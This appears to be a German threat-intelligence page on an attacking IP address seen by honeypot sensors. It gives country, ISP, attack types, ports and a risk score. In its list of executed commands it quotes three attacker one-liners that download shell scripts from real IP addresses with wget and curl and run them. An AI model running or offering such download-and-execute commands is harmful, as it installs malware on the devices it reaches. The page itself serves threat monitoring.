TROYANOSYVIRUS
Aktive BedrohungHOCH

176.65.139.20

Herkunftsland🇸🇬 Singapur
Erste Erkennung2.2.2026
Letzte Aktivitat23.2.2026
ISPOVH SAS
🎯
38
Gesamtangriffe
🔌
12
Ports
📡
6
Angriffsarten
🦠
0
Malware

Geolokalisierung

Land
🇸🇬 Singapur
Stadt
Unbekannt
ASN
AS16276
ISP
OVH SAS

Angriffsarten

cowrie
honeyaml
adbhoney
dionaea
tanner
honeytrap

Angegriffene Ports

2380813000300155005555603617000170014563456575

Zugehorige Malware

Keine zugehorige Malware

Ausgefuhrte Befehle

$cd /data/local/tmp/; busybox wget http://176.65.139.21/file/w.sh; sh w.sh; curl http://176.65.139.21/file/c.sh; sh c.sh2x
$cd /data/local/tmp/; busybox wget http://130.12.180.120/file/w.sh; sh w.sh; curl http://130.12.180.120/file/c.sh; sh c.sh1x
$cd /data/local/tmp/ || cd /tmp ||cd /var/run||cd /mnt||cd /root || cd /; busybox wget -q http://130.12.180.151/file/w.sh; sh w.sh; curl -O http://130.12.180.151/file/c.sh; sh c.sh;1x

Risikobewertung

60
/100
NiedrigMittelHochKritisch